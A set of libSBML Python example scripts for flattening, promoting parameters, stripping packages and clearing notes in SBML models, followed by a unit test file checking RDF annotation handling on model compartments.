#### File: python/comp/flattenModel.py
```python
import sys
import os.path
import libsbml
def main (args):
"""usage: flattenModel.py [-p] input-filename output-filename
-p : list unused ports
"""
if len(args) != 4 and len(args) != 3 :
print(main.__doc__)
sys.exit(1)
leavePorts = False
if len(args) == 3:
infile = args[1]
outfile = args[2]
elif len(args) == 4:
if args[1] != "-p":
print(main.__doc__)
sys.exit(1)
else:
leavePorts = True
infile = args[2]
outfile = args[3]
if not os.path.exists(infile):
print("[Error] %s : No such file." % (infile))
sys.exit(1)
reader = libsbml.SBMLReader()
writer = libsbml.SBMLWriter()
sbmldoc = reader.readSBML(infile)
if sbmldoc.getNumErrors() > 0:
if sbmldoc.getError(0).getErrorId() == libsbml.XMLFileUnreadable:
# Handle case of unreadable file here.
sbmldoc.printErrors()
elif sbmldoc.getError(0).getErrorId() == libsbml.XMLFileOperationError:
# Handle case of other file error here.
sbmldoc.printErrors()
else:
# Handle other error cases here.
sbmldoc.printErrors()
sys.exit(1)
# Create the converter options
props = libsbml.ConversionProperties()
props.addOption("flatten comp", True, "flatten comp")
props.addOption("leavePorts", leavePorts, "unused ports should be listed in the flattened model")
# do conversion
result = sbmldoc.convert(props)
if (result != libsbml.LIBSBML_OPERATION_SUCCESS):
sbmldoc.printErrors()
print("[Error] Conversion failed... ("+ str(result) + ")")
sys.exit(1)
writer.writeSBML(sbmldoc, outfile)
print("Flat model written to %s" % (outfile))
if __name__ == '__main__':
main(sys.argv)
```
#### File: examples/python/promoteParameters.py
```python
import sys
import os.path
import libsbml
def main (args):
"""usage: promoteParameters.py input-filename output-filename
"""
if len(args) != 3:
print(main.__doc__)
sys.exit(1)
infile = args[1]
outfile = args[2]
if not os.path.exists(infile):
print("[Error] %s : No such file." % (infile))
sys.exit(1)
reader = libsbml.SBMLReader()
writer = libsbml.SBMLWriter()
sbmldoc = reader.readSBML(infile)
if sbmldoc.getNumErrors() > 0:
if sbmldoc.getError(0).getErrorId() == libsbml.XMLFileUnreadable:
# Handle case of unreadable file here.
sbmldoc.printErrors()
elif sbmldoc.getError(0).getErrorId() == libsbml.XMLFileOperationError:
# Handle case of other file error here.
sbmldoc.printErrors()
else:
# Handle other error cases here.
sbmldoc.printErrors()
sys.exit(1)
props = libsbml.ConversionProperties()
props.addOption("promoteLocalParameters", True, "Promotes all Local Parameters to Global ones")
if (sbmldoc.convert(props) != libsbml.LIBSBML_OPERATION_SUCCESS):
print("[Error] Conversion failed...")
sys.exit(1)
writer.writeSBML(sbmldoc, outfile)
print("[OK] wrote %s" % (package, infile, outfile))
if __name__ == '__main__':
main(sys.argv)
```
#### File: examples/python/readSBML.py
```python
import sys
import time
import os
import os.path
from libsbml import *
def main (args):
"""Usage: readSBML filename
"""
if (len(args) != 2):
print("Usage: readSBML filename");
return 1;
filename = args[1];
current = time.clock();
document = readSBML(filename);
errors = document.getNumErrors();
print;
print(" filename: " + filename);
print(" file size: " + str(os.stat(filename).st_size));
print(" read time (ms): " + str(time.clock() - current));
print(" validation error(s): " + str(errors));
print;
document.printErrors();
return errors;
if __name__ == '__main__':
main(sys.argv)
```
#### File: examples/python/stripPackage.py
```python
import sys
import os.path
import libsbml
def main (args):
"""usage: stripPackage.py input-filename package-to-strip output-filename
"""
if len(args) != 4:
print(main.__doc__)
sys.exit(1)
infile = args[1]
package = args[2]
outfile = args[3]
if not os.path.exists(infile):
print("[Error] %s : No such file." % (infile))
sys.exit(1)
reader = libsbml.SBMLReader()
writer = libsbml.SBMLWriter()
sbmldoc = reader.readSBML(infile)
if sbmldoc.getNumErrors() > 0:
if sbmldoc.getError(0).getErrorId() == libsbml.XMLFileUnreadable:
# Handle case of unreadable file here.
sbmldoc.printErrors()
elif sbmldoc.getError(0).getErrorId() == libsbml.XMLFileOperationError:
# Handle case of other file error here.
sbmldoc.printErrors()
else:
# Handle other error cases here.
sbmldoc.printErrors()
sys.exit(1)
props = libsbml.ConversionProperties()
props.addOption("stripPackage", True, "Strip SBML Level 3 package constructs from the model")
props.addOption("package", package, "Name of the SBML Level 3 package to be stripped")
if (sbmldoc.convert(props) != libsbml.LIBSBML_OPERATION_SUCCESS):
print("[Error] Conversion failed...")
sys.exit(1)
writer.writeSBML(sbmldoc, outfile)
print("[OK] stripped package '%s' from %s to %s" % (package, infile, outfile))
if __name__ == '__main__':
main(sys.argv)
```
#### File: examples/python/unsetNotes.py
```python
import sys
import time
import os
import os.path
from libsbml import *
def main (args):
"""Usage: unsetNotes <input-filename> <output-filename>
"""
if (len(args) != 3):
print("\n" + "Usage: unsetNotes <input-filename> <output-filename>" + "\n" + "\n");
return 1;
filename = args[1];
document = readSBML(filename);
errors = document.getNumErrors();
if (errors > 0):
document.printErrors();
return errors;
m = document.getModel();
m.unsetNotes();
for i in range(0, m.getNumReactions()):
re = m.getReaction(i);
re.unsetNotes();
for j in range(0, re.getNumReactants()):
rt = re.getReactant(j);
rt.unsetNotes();
for j in range(0, re.getNumProducts()):
rt = re.getProduct(j);
rt.unsetNotes();
for j in range(0, re.getNumModifiers()):
md = re.getModifier(j);
md.unsetNotes();
if (re.isSetKineticLaw()):
kl = re.getKineticLaw();
kl.unsetNotes();
for j in range(0, kl.getNumParameters()):
pa = kl.getParameter(j);
pa.unsetNotes();
for i in range(0, m.getNumSpecies()):
sp = m.getSpecies(i);
sp.unsetNotes();
for i in range(0, m.getNumCompartments()):
sp = m.getCompartment(i);
sp.unsetNotes();
for i in range(0, m.getNumFunctionDefinitions()):
sp = m.getFunctionDefinition(i);
sp.unsetNotes();
for i in range(0, m.getNumUnitDefinitions()):
sp = m.getUnitDefinition(i);
sp.unsetNotes();
for i in range(0, m.getNumParameters()):
sp = m.getParameter(i);
sp.unsetNotes();
for i in range(0, m.getNumRules()):
sp = m.getRule(i);
sp.unsetNotes();
for i in range(0, m.getNumInitialAssignments()):
sp = m.getInitialAssignment(i);
sp.unsetNotes();
for i in range(0, m.getNumEvents()):
sp = m.getEvent(i);
sp.unsetNotes();
for j in range(0, sp.getNumEventAssignments()):
ea = sp.getEventAssignment(j);
ea.unsetNotes();
for i in range(0, m.getNumSpeciesTypes()):
sp = m.getSpeciesType(i);
sp.unsetNotes();
for i in range(0, m.getNumConstraints()):
sp = m.getConstraint(i);
sp.unsetNotes();
writeSBML(document, args[2]);
return errors;
if __name__ == '__main__':
main(sys.argv)
```
#### File: test/annotation/TestSyncAnnotation.py
```python
import sys
import unittest
import libsbml
def wrapString(s):
return s
pass
class TestSyncAnnotation(unittest.TestCase):
global d
d = None
global m
m = None
def equals(self, *x):
if len(x) == 2:
return x[0] == x[1]
elif len(x) == 1:
return x[0] == self.OSS.str()
def setUp(self):
filename = "../../sbml/annotation/test/test-data/annotationL3_2.xml"
self.d = libsbml.readSBML(filename)
self.m = self.d.getModel()
pass
def tearDown(self):
self.d = None
pass
def test_SyncAnnotation_deleteCVTerms(self):
c = self.m.getCompartment(1)
xml = libsbml.RDFAnnotationParser.deleteRDFCVTermAnnotation(c.getAnnotation())
expected = wrapString("<annotation>\n"
+
" <jd2:JDesignerLayout version=\"2.0\" MajorVersion=\"2\" MinorVersion=\"0\" BuildVersion=\"41\">\n"
+
" <jd2:header>\n"
+
" <jd2:VersionHeader JDesignerVersion=\"2.0\"/>\n"
+
" <jd2:ModelHeader Author=\"<NAME>\" ModelVersion=\"0.0\" ModelTitle=\"untitled\"/>\n"
+
" <jd2:TimeCourseDetails timeStart=\"0\" timeEnd=\"10\" numberOfPoints=\"1000\"/>\n"
+
" </jd2:header>\n"
+
" </jd2:JDesignerLayout>\n"
+
" <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n"
+
" <rdf:Description rdf:about=\"#_000003\">\n"
+
" <dc:creator>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:parseType=\"Resource\">\n"
+
" <vCard:N rdf:parseType=\"Resource\">\n"
+
" <vCard:Family>Le Novere</vCard:Family>\n"
+
" <vCard:Given>Nicolas</vCard:Given>\n"
+
" </vCard:N>\n"
+
" <vCard:EMAIL><EMAIL></vCard:EMAIL>\n"
+
" <vCard:ORG>\n"
+
" <vCard:Orgname>EMBL-EBI</vCard:Orgname>\n"
+
" </vCard:ORG>\n"
+
" </rdf:li>\n"
+
" </rdf:Bag>\n"
+
" </dc:creator>\n"
+
" <dcterms:created rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2005-02-02T14:56:11</dcterms:W3CDTF>\n"
+
" </dcterms:created>\n"
+
" <dcterms:modified rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2006-05-30T10:46:02</dcterms:W3CDTF>\n"
+
" </dcterms:modified>\n"
+
" </rdf:Description>\n"
+
" <rdf:Description>\n"
+
" <rdf:other/>\n"
+
" </rdf:Description>\n"
+
" </rdf:RDF>\n"
+
"</annotation>")
self.assertEqual( True, self.equals(expected,xml.toXMLString()) )
pass
def test_SyncAnnotation_deleteModelOnly(self):
c = self.m.getCompartment(1)
xml = libsbml.RDFAnnotationParser.deleteRDFHistoryAnnotation(c.getAnnotation())
expected = wrapString("<annotation>\n"
+
" <jd2:JDesignerLayout version=\"2.0\" MajorVersion=\"2\" MinorVersion=\"0\" BuildVersion=\"41\">\n"
+
" <jd2:header>\n"
+
" <jd2:VersionHeader JDesignerVersion=\"2.0\"/>\n"
+
" <jd2:ModelHeader Author=\"<NAME>\" ModelVersion=\"0.0\" ModelTitle=\"untitled\"/>\n"
+
" <jd2:TimeCourseDetails timeStart=\"0\" timeEnd=\"10\" numberOfPoints=\"1000\"/>\n"
+
" </jd2:header>\n"
+
" </jd2:JDesignerLayout>\n"
+
" <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n"
+
" <rdf:Description rdf:about=\"#_000003\">\n"
+
" <bqbiol:is>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n"
+
" </rdf:Bag>\n"
+
" </bqbiol:is>\n"
+
" </rdf:Description>\n"
+
" <rdf:Description>\n"
+
" <rdf:other/>\n"
+
" </rdf:Description>\n"
+
" </rdf:RDF>\n"
+
"</annotation>")
self.assertEqual( True, self.equals(expected,xml.toXMLString()) )
pass
def test_SyncAnnotation_deleteModelOnly_1(self):
c = self.m.getCompartment(7)
xml = libsbml.RDFAnnotationParser.deleteRDFHistoryAnnotation(c.getAnnotation())
expected = wrapString("<annotation>\n"
+
" <jd2:JDesignerLayout version=\"2.0\" MajorVersion=\"2\" MinorVersion=\"0\" BuildVersion=\"41\">\n"
+
" <jd2:header>\n"
+
" <jd2:VersionHeader JDesignerVersion=\"2.0\"/>\n"
+
" <jd2:ModelHeader Author=\"<NAME>\" ModelVersion=\"0.0\" ModelTitle=\"untitled\"/>\n"
+
" <jd2:TimeCourseDetails timeStart=\"0\" timeEnd=\"10\" numberOfPoints=\"1000\"/>\n"
+
" </jd2:header>\n"
+
" </jd2:JDesignerLayout>\n"
+
"</annotation>")
self.assertEqual( True, self.equals(expected,xml.toXMLString()) )
xml = libsbml.RDFAnnotationParser.deleteRDFHistoryAnnotation(None)
self.assert_( xml == None )
xml = libsbml.RDFAnnotationParser.deleteRDFHistoryAnnotation(libsbml.XMLNode.convertStringToXMLNode("<notannotatio/>"))
self.assert_( xml == None )
pass
def test_SyncAnnotation_modifyBoth_1(self):
c = self.m.getCompartment(0)
mh = self.m.getModelHistory().clone()
cv = self.m.getCVTerm(0).clone()
c.setModelHistory(mh)
c.addCVTerm(cv)
c.unsetCVTerms()
expected = wrapString("<compartment metaid=\"_000002\" id=\"comp1\" constant=\"true\">\n"
+
" <annotation>\n"
+
" <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n"
+
" <rdf:Description rdf:about=\"#_000002\">\n"
+
" <dc:creator>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:parseType=\"Resource\">\n"
+
" <vCard:N rdf:parseType=\"Resource\">\n"
+
" <vCard:Family><NAME></vCard:Family>\n"
+
" <vCard:Given>Nicolas</vCard:Given>\n"
+
" </vCard:N>\n"
+
" <vCard:EMAIL><EMAIL></vCard:EMAIL>\n"
+
" <vCard:ORG rdf:parseType=\"Resource\">\n"
+
" <vCard:Orgname>EMBL-EBI</vCard:Orgname>\n"
+
" </vCard:ORG>\n"
+
" </rdf:li>\n"
+
" </rdf:Bag>\n"
+
" </dc:creator>\n"
+
" <dcterms:created rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2005-02-02T14:56:11Z</dcterms:W3CDTF>\n"
+
" </dcterms:created>\n"
+
" <dcterms:modified rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2006-05-30T10:46:02Z</dcterms:W3CDTF>\n"
+
" </dcterms:modified>\n"
+
" </rdf:Description>\n"
+
" </rdf:RDF>\n"
+
" </annotation>\n"
+
"</compartment>")
self.assertEqual( True, self.equals(expected,c.toSBML()) )
c.unsetModelHistory()
c.addCVTerm(cv)
expected1 = wrapString("<compartment metaid=\"_000002\" id=\"comp1\" constant=\"true\">\n"
+
" <annotation>\n"
+
" <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n"
+
" <rdf:Description rdf:about=\"#_000002\">\n"
+
" <bqbiol:is>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n"
+
" </rdf:Bag>\n"
+
" </bqbiol:is>\n"
+
" </rdf:Description>\n"
+
" </rdf:RDF>\n"
+
" </annotation>\n"
+
"</compartment>")
self.assertEqual( True, self.equals(expected1,c.toSBML()) )
c.setModelHistory(mh)
c.unsetCVTerms()
c.addCVTerm(cv)
expected2 = wrapString("<compartment metaid=\"_000002\" id=\"comp1\" constant=\"true\">\n"
+
" <annotation>\n"
+
" <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n"
+
" <rdf:Description rdf:about=\"#_000002\">\n"
+
" <dc:creator>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:parseType=\"Resource\">\n"
+
" <vCard:N rdf:parseType=\"Resource\">\n"
+
" <vCard:Family><NAME></vCard:Family>\n"
+
" <vCard:Given>Nicolas</vCard:Given>\n"
+
" </vCard:N>\n"
+
" <vCard:EMAIL><EMAIL></vCard:EMAIL>\n"
+
" <vCard:ORG rdf:parseType=\"Resource\">\n"
+
" <vCard:Orgname>EMBL-EBI</vCard:Orgname>\n"
+
" </vCard:ORG>\n"
+
" </rdf:li>\n"
+
" </rdf:Bag>\n"
+
" </dc:creator>\n"
+
" <dcterms:created rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2005-02-02T14:56:11Z</dcterms:W3CDTF>\n"
+
" </dcterms:created>\n"
+
" <dcterms:modified rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2006-05-30T10:46:02Z</dcterms:W3CDTF>\n"
+
" </dcterms:modified>\n"
+
" <bqbiol:is>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n"
+
" </rdf:Bag>\n"
+
" </bqbiol:is>\n"
+
" </rdf:Description>\n"
+
" </rdf:RDF>\n"
+
" </annotation>\n"
+
"</compartment>")
self.assertEqual( True, self.equals(expected2,c.toSBML()) )
pass
def test_SyncAnnotation_modifyBoth_2(self):
c = self.m.getCompartment(0)
mh = self.m.getModelHistory().clone()
cv = self.m.getCVTerm(0).clone()
c.setModelHistory(mh)
c.unsetModelHistory()
c.addCVTerm(cv)
expected = wrapString("<compartment metaid=\"_000002\" id=\"comp1\" constant=\"true\">\n"
+
" <annotation>\n"
+
" <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n"
+
" <rdf:Description rdf:about=\"#_000002\">\n"
+
" <bqbiol:is>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n"
+
" </rdf:Bag>\n"
+
" </bqbiol:is>\n"
+
" </rdf:Description>\n"
+
" </rdf:RDF>\n"
+
" </annotation>\n"
+
"</compartment>")
self.assertEqual( True, self.equals(expected,c.toSBML()) )
pass
def test_SyncAnnotation_modifyBoth_3(self):
c = self.m.getCompartment(0)
mh = self.m.getModelHistory().clone()
cv = self.m.getCVTerm(0).clone()
c.setModelHistory(mh)
c.addCVTerm(cv)
expected = wrapString("<compartment metaid=\"_000002\" id=\"comp1\" constant=\"true\">\n"
+
" <annotation>\n"
+
" <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n"
+
" <rdf:Description rdf:about=\"#_000002\">\n"
+
" <dc:creator>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:parseType=\"Resource\">\n"
+
" <vCard:N rdf:parseType=\"Resource\">\n"
+
" <vCard:Family>Le Novere</vCard:Family>\n"
+
" <vCard:Given>Nicolas</vCard:Given>\n"
+
" </vCard:N>\n"
+
" <vCard:EMAIL><EMAIL></vCard:EMAIL>\n"
+
" <vCard:ORG rdf:parseType=\"Resource\">\n"
+
" <vCard:Orgname>EMBL-EBI</vCard:Orgname>\n"
+
" </vCard:ORG>\n"
+
" </rdf:li>\n"
+
" </rdf:Bag>\n"
+
" </dc:creator>\n"
+
" <dcterms:created rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2005-02-02T14:56:11Z</dcterms:W3CDTF>\n"
+
" </dcterms:created>\n"
+
" <dcterms:modified rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2006-05-30T10:46:02Z</dcterms:W3CDTF>\n"
+
" </dcterms:modified>\n"
+
" <bqbiol:is>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n"
+
" </rdf:Bag>\n"
+
" </bqbiol:is>\n"
+
" </rdf:Description>\n"
+
" </rdf:RDF>\n"
+
" </annotation>\n"
+
"</compartment>")
self.assertEqual( True, self.equals(expected,c.toSBML()) )
pass
def test_SyncAnnotation_modifyBoth_4(self):
c = self.m.getCompartment(1)
mh = c.getModelHistory().clone()
cv = c.getCVTerm(0).clone()
c.unsetModelHistory()
c.unsetCVTerms()
expected = wrapString("<compartment metaid=\"_000003\" id=\"A\" constant=\"true\">\n"
+
" <annotation>\n"
+
" <jd2:JDesignerLayout version=\"2.0\" MajorVersion=\"2\" MinorVersion=\"0\" BuildVersion=\"41\">\n"
+
" <jd2:header>\n"
+
" <jd2:VersionHeader JDesignerVersion=\"2.0\"/>\n"
+
" <jd2:ModelHeader Author=\"<NAME>\" ModelVersion=\"0.0\" ModelTitle=\"untitled\"/>\n"
+
" <jd2:TimeCourseDetails timeStart=\"0\" timeEnd=\"10\" numberOfPoints=\"1000\"/>\n"
+
" </jd2:header>\n"
+
" </jd2:JDesignerLayout>\n"
+
" <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n"
+
" <rdf:Description>\n"
+
" <rdf:other/>\n"
+
" </rdf:Description>\n"
+
" </rdf:RDF>\n"
+
" </annotation>\n"
+
"</compartment>")
self.assertEqual( True, self.equals(expected,c.toSBML()) )
c.setModelHistory(mh)
c.addCVTerm(cv)
c.unsetCVTerms()
expected1 = wrapString("<compartment metaid=\"_000003\" id=\"A\" constant=\"true\">\n"
+
" <annotation>\n"
+
" <jd2:JDesignerLayout version=\"2.0\" MajorVersion=\"2\" MinorVersion=\"0\" BuildVersion=\"41\">\n"
+
" <jd2:header>\n"
+
" <jd2:VersionHeader JDesignerVersion=\"2.0\"/>\n"
+
" <jd2:ModelHeader Author=\"Mr Untitled\" ModelVersion=\"0.0\" ModelTitle=\"untitled\"/>\n"
+
" <jd2:TimeCourseDetails timeStart=\"0\" timeEnd=\"10\" numberOfPoints=\"1000\"/>\n"
+
" </jd2:header>\n"
+
" </jd2:JDesignerLayout>\n"
+
" <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n"
+
" <rdf:Description rdf:about=\"#_000003\">\n"
+
" <dc:creator>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:parseType=\"Resource\">\n"
+
" <vCard:N rdf:parseType=\"Resource\">\n"
+
" <vCard:Family>Le Novere</vCard:Family>\n"
+
" <vCard:Given>Nicolas</vCard:Given>\n"
+
" </vCard:N>\n"
+
" <vCard:EMAIL><EMAIL></vCard:EMAIL>\n"
+
" <vCard:ORG rdf:parseType=\"Resource\">\n"
+
" <vCard:Orgname>EMBL-EBI</vCard:Orgname>\n"
+
" </vCard:ORG>\n"
+
" </rdf:li>\n"
+
" </rdf:Bag>\n"
+
" </dc:creator>\n"
+
" <dcterms:created rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2005-02-02T14:56:11Z</dcterms:W3CDTF>\n"
+
" </dcterms:created>\n"
+
" <dcterms:modified rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2006-05-30T10:46:02Z</dcterms:W3CDTF>\n"
+
" </dcterms:modified>\n"
+
" </rdf:Description>\n"
+
" <rdf:Description>\n"
+
" <rdf:other/>\n"
+
" </rdf:Description>\n"
+
" </rdf:RDF>\n"
+
" </annotation>\n"
+
"</compartment>")
self.assertEqual( True, self.equals(expected1,c.toSBML()) )
c.unsetModelHistory()
c.unsetCVTerms()
c.addCVTerm(cv)
expected2 = wrapString("<compartment metaid=\"_000003\" id=\"A\" constant=\"true\">\n"
+
" <annotation>\n"
+
" <jd2:JDesignerLayout version=\"2.0\" MajorVersion=\"2\" MinorVersion=\"0\" BuildVersion=\"41\">\n"
+
" <jd2:header>\n"
+
" <jd2:VersionHeader JDesignerVersion=\"2.0\"/>\n"
+
" <jd2:ModelHeader Author=\"Mr Untitled\" ModelVersion=\"0.0\" ModelTitle=\"untitled\"/>\n"
+
" <jd2:TimeCourseDetails timeStart=\"0\" timeEnd=\"10\" numberOfPoints=\"1000\"/>\n"
+
" </jd2:header>\n"
+
" </jd2:JDesignerLayout>\n"
+
" <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n"
+
" <rdf:Description rdf:about=\"#_000003\">\n"
+
" <bqbiol:is>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n"
+
" </rdf:Bag>\n"
+
" </bqbiol:is>\n"
+
" </rdf:Description>\n"
+
" <rdf:Description>\n"
+
" <rdf:other/>\n"
+
" </rdf:Description>\n"
+
" </rdf:RDF>\n"
+
" </annotation>\n"
+
"</compartment>")
self.assertEqual( True, self.equals(expected2,c.toSBML()) )
c.unsetModelHistory()
c.unsetCVTerms()
c.addCVTerm(cv)
c.setModelHistory(mh)
expected3 = wrapString("<compartment metaid=\"_000003\" id=\"A\" constant=\"true\">\n"
+
" <annotation>\n"
+
" <jd2:JDesignerLayout version=\"2.0\" MajorVersion=\"2\" MinorVersion=\"0\" BuildVersion=\"41\">\n"
+
" <jd2:header>\n"
+
" <jd2:VersionHeader JDesignerVersion=\"2.0\"/>\n"
+
" <jd2:ModelHeader Author=\"Mr Untitled\" ModelVersion=\"0.0\" ModelTitle=\"untitled\"/>\n"
+
" <jd2:TimeCourseDetails timeStart=\"0\" timeEnd=\"10\" numberOfPoints=\"1000\"/>\n"
+
" </jd2:header>\n"
+
" </jd2:JDesignerLayout>\n"
+
" <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n"
+
" <rdf:Description rdf:about=\"#_000003\">\n"
+
" <dc:creator>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:parseType=\"Resource\">\n"
+
" <vCard:N rdf:parseType=\"Resource\">\n"
+
" <vCard:Family>Le Novere</vCard:Family>\n"
+
" <vCard:Given>Nicolas</vCard:Given>\n"
+
" </vCard:N>\n"
+
" <vCard:EMAIL><EMAIL></vCard:EMAIL>\n"
+
" <vCard:ORG rdf:parseType=\"Resource\">\n"
+
" <vCard:Orgname>EMBL-EBI</vCard:Orgname>\n"
+
" </vCard:ORG>\n"
+
" </rdf:li>\n"
+
" </rdf:Bag>\n"
+
" </dc:creator>\n"
+
" <dcterms:created rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2005-02-02T14:56:11Z</dcterms:W3CDTF>\n"
+
" </dcterms:created>\n"
+
" <dcterms:modified rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2006-05-30T10:46:02Z</dcterms:W3CDTF>\n"
+
" </dcterms:modified>\n"
+
" <bqbiol:is>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n"
+
" </rdf:Bag>\n"
+
" </bqbiol:is>\n"
+
" </rdf:Description>\n"
+
" <rdf:Description>\n"
+
" <rdf:other/>\n"
+
" </rdf:Description>\n"
+
" </rdf:RDF>\n"
+
" </annotation>\n"
+
"</compartment>")
self.assertEqual( True, self.equals(expected3,c.toSBML()) )
pass
def test_SyncAnnotation_modifyCVTerms_1(self):
c = self.m.getCompartment(4)
cv = c.getCVTerm(0).clone()
c.unsetCVTerms()
c.addCVTerm(cv)
expected = wrapString("<compartment metaid=\"_000012\" id=\"cc\" constant=\"true\">\n"
+
" <annotation>\n"
+
" <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n"
+
" <rdf:Description rdf:about=\"#_000012\">\n"
+
" <bqbiol:is>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n"
+
" </rdf:Bag>\n"
+
" </bqbiol:is>\n"
+
" </rdf:Description>\n"
+
" </rdf:RDF>\n"
+
" </annotation>\n"
+
"</compartment>")
self.assertEqual( True, self.equals(expected,c.toSBML()) )
pass
